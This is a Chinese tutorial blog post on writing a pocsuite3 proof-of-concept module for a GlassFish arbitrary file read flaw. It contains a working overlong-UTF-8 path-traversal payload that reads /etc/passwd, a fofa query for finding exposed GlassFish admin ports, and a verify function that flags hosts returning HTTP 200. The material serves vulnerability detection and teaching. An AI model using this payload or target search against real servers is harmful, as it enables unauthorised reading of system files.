2. 程式人生 > 其它 >pocsuite3檢測工具 編寫poc

pocsuite3檢測工具 編寫poc

阿新 發佈:2021-08-13

github地址:https://github.com/knownsec/Pocsuite3

首先確定pocsuit的命令執行方式

verify模式為漏洞檢測模式

attack模式為向目標發起有效的攻擊

首先找到一個poc 進行分析原始碼

複製其原始碼,再原有的基礎框架進行修改,首先修改檢測模組

這裡舉例glassfish檔案讀取漏洞

payload = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'

這裡根據網頁的返回碼進行判定是否存在漏洞,若code為200,則存在該漏洞。

原thinkphp的檢測模組

修改後的

更改描述

fofa搜尋:"glassfish" && port="4848"

執行命令檢測

修改 
    def _verify(self):
        result = {}
        poc_url=self.url  #根據原有框架獲取url
        payload = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
 
'
        resp = requests.get(poc_url + payload)
        try:
            if resp.status_code == 200:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = poc_url
                result['VerifyInfo']['Postdata'] = payload
        except Exception as e:
            pass
 

        return self.parse_output(result)

相關推薦

pocsuite3檢測工具 編寫poc

github地址:https://github.com/knownsec/Pocsuite3 首先確定pocsuit的命令執行方式 verify模式為漏洞檢測模式

Win10記憶體檢測工具怎麼用?Win10用工具排查記憶體是否正常的方法

Win10作業系統內建有很多實用的功能,大家平時比較少用到,比如記憶體檢測工具,此工具有什麼作用?如果電腦出現無故的藍屏,或是重新啟動,用記憶體檢測工具排查記憶體是否正常。那麼Win10記憶體檢測工具怎麼用?下

【Python基礎程式設計001 ● Python入門 ● 使用Pycharm開發工具編寫Hello World 】

---------Python基礎程式設計--------- Author : AI菌 【內容講解】 pycharm開發工具的基本使用:

weblogic XMLDecoder反序列化 CVE-2017-10271 工具檢測+工具利用復現

被360眾測靶場殘虐,所以決定把這些常規漏洞(Vulhub)都學一下他們的利用。

robots檢測外掛編寫

首先先把url分割 url = \'https://www.baidu.com/s?wd=123&rsv_spt=1&rsv_iqid=0x8d22781d000014ad&issp=1&f=8&rsv_bp=1&rsv_idx=2&ie=utf-8&tn=baiduhome_pg&rsv_dl=tb&rs

網站效能優化檢測工具

工具一:PageSpeed Insights(只是給出建議點,為谷歌瀏覽器的外掛) 一、介紹:PageSpeed Lnsights依賴谷歌瀏覽器,依附在谷歌瀏覽器的可擴充套件外掛中。如果網速什麼的可以,線上安裝只需要在谷歌商店中找到對應的

Rootkit Hunter系統檢測工具

在我今天說Rooterkit Hunter之前我來說說一些基本概念。在linux下的root意味著超級使用者權利無限大,那麼在如今脆弱的網際網路大環境下,我們怎麼樣才能做些簡單得檢測進行分析、檢視呢?怎麼樣才能夠獲得

CVE-2019-0708: Windows RDP遠端漏洞無損檢測工具下載

CVE-2019-0708: Windows RDP遠端漏洞無損檢測工具下載 0x00下載連結 https://free.360totalsecurity.com/CVE-2019-0708/detector_release.zip

spring特殊字元轉義和方法入參檢測工具

技術標籤:springjavajavascripthtml 由於 Web 應用程式需要聯合使用到多種語言,每種語言都包含一些特殊的字元,對於動態語言或標籤式的語言而言,如果需要動態構造語言的內容時,一個我們經常會碰到的問題就是

基於Python的郵件檢測工具

郵件快速檢測工具 概要介紹 mmpi,是一款使用python實現的開源郵件快速檢測工具庫,基於community框架設計開發。mmpi支援對郵件頭、郵件正文、郵件附件的解析檢測,並輸出json檢測報告。

python 郵件檢測工具mmpi的使用

概要介紹 mmpi,是一款使用python實現的開源郵件快速檢測工具庫,基於community框架設計開發。mmpi支援對郵件頭、郵件正文、郵件附件的解析檢測,並輸出json檢測報告。

JetBrains釋出java程式碼質量檢測工具Qodana早期預覽版

JetBrains正在開發一種被稱為Qodana的程式碼質量檢測工具。它將JetBrains IDE具有的智慧程式碼檢查帶入了專案CI/CD管道中。它可以識別程式碼中的錯誤,安全漏洞,重複項和缺陷並提出修復建議。使開發人員輕鬆地改善

coverity程式碼檢測工具介紹_從 pingcap tidb 學習使用靜態檢查工具提升程式碼質量

技術標籤:coverity程式碼檢測工具介紹 大家好,我是 Rustin 。今天想跟大家簡單介紹一下如何使用一些 golang 的靜態程式碼檢查工具來提升程式碼質量!

python寫一個incaseformat檢測工具

技術標籤:工具python反病毒 一、incaseformat 1.13日爆發的incaseformat病毒會在對應的系統時間觸發攻擊行為,能在短時間內刪除除了系統盤之外的所有檔案。據研究人員稱該病毒會在1.23再次爆發,小R根據該病毒生

Sonar程式碼檢測工具安裝與使用及問題記錄

安裝參考文件:https://www.cnblogs.com/qlqwjy/p/10551283.html 安裝的步驟說明他已經寫得很詳細了,這邊主要記錄一下安裝過程中的問題

微軟 Win11 硬體檢測工具更新,可告訴使用者為什麼不符合要求

6 月 26 日訊息在 Win11 釋出後,微軟釋出了一個檢查使用者的 PC 是否可以執行 Win11 的應用程式,名為“電腦健康狀況檢查”。

微軟不給力,開發者於是自制了一款開源的 Win11 升級檢測工具

6 月 27 日訊息 微軟本週正式釋出了全新的 Windows 11 作業系統,但 Win11 有一些特定要求,外媒認為很可能有超過 2/3 的 PC 無法升級到新系統。

微軟承認其 Win11 升級電腦健康狀況檢測工具存在 bug,現已下架

6 月 29 日訊息 微軟上週釋出了全新的 Windows 11 作業系統,但奈何升級條件苛刻引起網友吐槽。對此,微軟只好推出了一款“電腦健康狀況檢查”軟體來幫助使用者檢視哪裡不滿足升級條件。

巧推網站SEO優化實用的挖詞工具和優化檢測工具大全!

在日常優化網站過程中,我們需要用到以下幾種SEO工具: 一、常見的長尾詞挖掘工具

程式碼質量檢測工具 SONARQUBE7.6 配置和使用(Windows)

程式碼質量檢測工具 SONARQUBE7.6 配置和使用(Windows) 一、執行環境 Java8、MySQL5.7、maven3.5(非必須)